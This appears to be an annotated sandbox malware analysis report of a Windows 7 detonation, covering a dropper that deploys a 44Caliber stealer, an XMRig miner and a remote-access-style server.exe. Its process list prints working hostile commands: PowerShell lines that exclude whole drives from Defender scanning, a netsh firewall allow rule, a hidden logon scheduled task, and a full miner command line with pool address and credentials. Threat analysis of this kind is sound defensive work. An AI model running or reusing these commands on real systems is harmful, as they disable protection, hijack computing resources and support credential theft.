memory/4452-187-0x000002381F0E0000-0x000002381F0E2000-memory.dmp

memory/4452-189-0x000002381F0E6000-0x000002381F0E7000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-20 05:19

Reported

2022-03-20 05:22

Platform

win7-20220310-en

Max time kernel

4294216s (implausible for a detonation submitted at 05:19 and reported at 05:22; treat as a reporting artefact)

Max time network

170s

Command Line

"C:\Users\Admin\AppData\Local\Temp\65119209.exe"

Signatures

44Caliber

stealer 44caliber

xmrig

miner xmrig

XMRig Miner Payload

miner (11 payload hits; the report records no description, indicator, process or target for them)

Modifies Windows Firewall

evasion

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A

server.exe is a component that only the Windows 7 run recorded; it is not among the hashed files on this page. It persists itself three ways under one identifier, c8a9da7fa674aa389aad9af7feb5a543: a copy in the user's Startup folder (above), a per-user Run value and a machine-wide Run value, the last of which succeeds only because the sample runs elevated. The trailing ".." argument on the Run command and the MD5-style identifier are a pattern commonly associated with njRAT-family builds, as are the SeIncBasePriorityPrivilege requests and GetForegroundWindowSpam further down, but the report itself does not classify server.exe.

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | freegeoip.app | N/A | N/A (2 hits)

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | C:\Windows\System32\conhost.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (4 hits)
File created | C:\Windows\system32\services64.exe | C:\Windows\System32\conhost.exe | N/A
File opened for modification | C:\Windows\system32\services64.exe | C:\Windows\System32\conhost.exe | N/A
File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | C:\Windows\System32\conhost.exe | N/A

The four powershell.exe rows are PowerShell touching its own Start Menu shortcut on first run, reported under an unexpanded %ProgramData% path; they are sandbox noise. The conhost.exe rows are the same three drops (services64.exe, sihost64.exe, WR64.sys) seen in the Windows 10 run.

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1412 set thread context of 1452 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe

The same conhost.exe-into-svchost.exe hollowing as on Windows 10, with different PIDs.

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\svchost.exe

The crashing svchost.exe is the hollowed miner host from the SetThreadContext row above.

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Insidious2.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\Insidious2.exe | N/A

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Hits
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious2.exe | N/A | 3
N/A | N/A | C:\Windows\System32\conhost.exe | N/A | 3
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 4
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A | 54

(The original report lists one identical row per hit; the counts above replace 64 such rows.)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1968 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
PID 1968 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1060 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe C:\Windows\System32\conhost.exe
PID 580 wrote to memory of 1624 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1624 wrote to memory of 2004 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 580 wrote to memory of 1416 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1416 wrote to memory of 1920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1168 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1624 wrote to memory of 1612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 580 wrote to memory of 1072 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1072 wrote to memory of 392 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 1668 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 392 wrote to memory of 1412 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1412 wrote to memory of 1092 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1092 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1412 wrote to memory of 1892 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1092 wrote to memory of 1616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1412 wrote to memory of 1452 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\65119209.exe

"C:\Users\Admin\AppData\Local\Temp\65119209.exe"

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

"C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\svchost.exe

C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=WarzoneHACK --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1452 -s 124

Network

Country Destination Domain Proto
US 8.8.8.8:53 freegeoip.app udp
US 188.114.96.0:443 freegeoip.app tcp
RU 82.202.167.67:7790 tcp

Files

\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

\Users\Admin\AppData\Local\Temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9542f730ec96bfcc506231c591780fbe
SHA1 f5beaeb8184a656d2933ff5e3bc48f44c81e943b
SHA256 1c75467f811d6ffb15d00100a3b88f45ba39e7dc076494267d3e0acb0e37e64e
SHA512 4858cd5a4999e95b1d971072b7bffeed4018d16d8acea12c743d677512ab3c705b31ff9c70e14a7c52b5368b63076cfcd4750004d49ccb1764d040b5f4a09bd4

\Windows\System32\services64.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b537feb04fff5c541eb94eaae0b98f3b
SHA1 47b66de9f241fe60132c0d12d0908ced00f8707c
SHA256 c01afbb3a7d42d2d2c313d5fce9196aad454c218fb73fc83ca5cc6023ab364ab
SHA512 ce3feac069332544ec468e4fcdff1069424971d3905072e7acb7a676d00b7538be3db53efe356372f0f2159a88baf636c835e2d9b4d3f08444579f949f24960a

\Windows\System32\Microsoft\Libs\sihost64.exe

MD5 3721b324b4d2c9dea6c6bc6a858fe337
SHA1 f3391c6414ed5bb89acc4ab5df2b837077a9a9c6
SHA256 fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206
SHA512 bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
